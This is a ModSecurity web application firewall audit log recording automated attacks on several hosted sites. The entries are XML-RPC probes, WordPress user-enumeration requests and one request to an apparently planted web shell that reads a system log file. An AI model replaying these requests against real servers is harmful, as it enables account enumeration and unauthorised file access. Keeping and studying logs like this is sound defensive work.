aE8APZK-05zbifgH_rQLmQAAAAU 183.56.195.106 44802 127.0.0.1 7081 --dd548706-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --dd548706-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --dd548706-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (38+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (38+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8APZK-05zbifgH_rQLmQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007869523860 289908 (- - -) Stopwatch2: 1750007869523860 289908; combined=2344, p1=342, p2=1551, p3=84, p4=48, p5=204, sr=92, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dd548706-Z-- --51d64f2d-A-- [15/Jun/2025:22:47:50.213209 +0530] aE8APTtuDRGAAnNiXIekbQAAAAg 168.121.179.248 47242 127.0.0.1 7081 --51d64f2d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 168.121.179.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --51d64f2d-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --51d64f2d-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8APTtuDRGAAnNiXIekbQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007869152555 1060739 (- - -) Stopwatch2: 1750007869152555 1060739; combined=1976, p1=349, p2=1497, p3=0, p4=0, p5=130, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --51d64f2d-Z-- --2cf75103-A-- [15/Jun/2025:22:47:53.177311 +0530] aE8AQJK-05zbifgH_rQLmwAAAAU 124.109.12.110 44946 127.0.0.1 7081 --2cf75103-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2cf75103-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --2cf75103-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE8AQJK-05zbifgH_rQLmwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007872880068 297305 (- - -) Stopwatch2: 1750007872880068 297305; combined=2100, p1=378, p2=1344, p3=66, p4=48, p5=165, sr=94, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2cf75103-Z-- --c28e5833-A-- [15/Jun/2025:22:48:04.519940 +0530] aE8AS4w8YNvdo5WL3nesqgAAAAc 43.134.233.254 47756 127.0.0.1 7081 --c28e5833-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 43.134.233.254 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c28e5833-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --c28e5833-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8AS4w8YNvdo5WL3nesqgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007883446802 1073223 (- - -) Stopwatch2: 1750007883446802 1073223; combined=2333, p1=404, p2=1834, p3=0, p4=0, p5=95, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c28e5833-Z-- --a1c75944-A-- [15/Jun/2025:22:48:07.552284 +0530] aE8ATjtuDRGAAnNiXIekdgAAAAg 128.199.112.101 47906 127.0.0.1 7081 --a1c75944-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a1c75944-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a1c75944-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8ATjtuDRGAAnNiXIekdgAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007886556646 995716 (- - -) Stopwatch2: 1750007886556646 995716; combined=2683, p1=427, p2=1800, p3=52, p4=66, p5=214, sr=114, sw=124, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a1c75944-Z-- --6d1ddc63-A-- [15/Jun/2025:22:48:16.504234 +0530] aE8AV2CPauOs0aEe3c0-hAAAAAI 202.137.142.71 39384 127.0.0.1 7081 --6d1ddc63-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 202.137.142.71 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6d1ddc63-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --6d1ddc63-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8AV2CPauOs0aEe3c0-hAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007895501401 1002938 (- - -) Stopwatch2: 1750007895501401 1002938; combined=2300, p1=363, p2=1812, p3=0, p4=0, p5=125, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6d1ddc63-Z-- --6a16154e-A-- [15/Jun/2025:22:48:27.047773 +0530] aE8AYkmAj8yxyFrMChhzTwAAAAE 124.158.172.222 49812 127.0.0.1 7081 --6a16154e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 124.158.172.222 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6a16154e-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --6a16154e-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8AYkmAj8yxyFrMChhzTwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007906086773 961135 (- - -) Stopwatch2: 1750007906086773 961135; combined=2714, p1=456, p2=2108, p3=0, p4=0, p5=149, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6a16154e-Z-- --70c1de6e-A-- [15/Jun/2025:22:48:28.293002 +0530] aE8AZBLQPChAjmM6-0i9FAAAAAQ 18.214.138.148 49910 127.0.0.1 7081 --70c1de6e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/mail.err.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.214.138.148 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --70c1de6e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --70c1de6e-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE8AZBLQPChAjmM6-0i9FAAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750007908289301 3759 (- - -) Stopwatch2: 1750007908289301 3759; combined=1989, p1=321, p2=1547, p3=34, p4=33, p5=54, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --70c1de6e-Z-- --f021e006-A-- [15/Jun/2025:22:48:49.532924 +0530] aE8AeRLQPChAjmM6-0i9JgAAAAQ 183.56.195.106 36092 127.0.0.1 7081 --f021e006-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --f021e006-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --f021e006-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (60+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (60+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8AeRLQPChAjmM6-0i9JgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007929234433 298552 (- - -) Stopwatch2: 1750007929234433 298552; combined=2199, p1=338, p2=1462, p3=83, p4=38, p5=171, sr=95, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f021e006-Z-- --780fa16a-A-- [15/Jun/2025:22:49:07.004879 +0530] aE8AihLQPChAjmM6-0i9MQAAAAQ 128.199.112.101 47064 127.0.0.1 7081 --780fa16a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --780fa16a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --780fa16a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8AihLQPChAjmM6-0i9MQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007946039001 965934 (- - -) Stopwatch2: 1750007946039001 965934; combined=2401, p1=392, p2=1650, p3=39, p4=57, p5=166, sr=104, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --780fa16a-Z-- --f16db446-A-- [15/Jun/2025:22:49:50.227812 +0530] aE8AtTtuDRGAAnNiXIekswAAAAg 183.56.195.106 46890 127.0.0.1 7081 --f16db446-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --f16db446-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --f16db446-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (46+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (46+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8AtTtuDRGAAnNiXIekswAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007989945162 282762 (- - -) Stopwatch2: 1750007989945162 282762; combined=2150, p1=358, p2=1397, p3=70, p4=38, p5=183, sr=107, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f16db446-Z-- --700ce509-A-- [15/Jun/2025:22:49:51.810831 +0530] aE8At2CPauOs0aEe3c0-vwAAAAI 124.109.12.110 46986 127.0.0.1 7081 --700ce509-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --700ce509-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --700ce509-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE8At2CPauOs0aEe3c0-vwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007991506776 304127 (- - -) Stopwatch2: 1750007991506776 304127; combined=2265, p1=373, p2=1443, p3=91, p4=54, p5=185, sr=109, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --700ce509-Z-- --21954454-A-- [15/Jun/2025:22:50:07.765854 +0530] aE8Axrv7QZcuXaML92AulwAAAAU 128.199.112.101 40924 127.0.0.1 7081 --21954454-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 507 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --21954454-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --21954454-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8Axrv7QZcuXaML92AulwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008006841173 924736 (- - -) Stopwatch2: 1750008006841173 924736; combined=2336, p1=379, p2=1565, p3=54, p4=63, p5=171, sr=104, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: 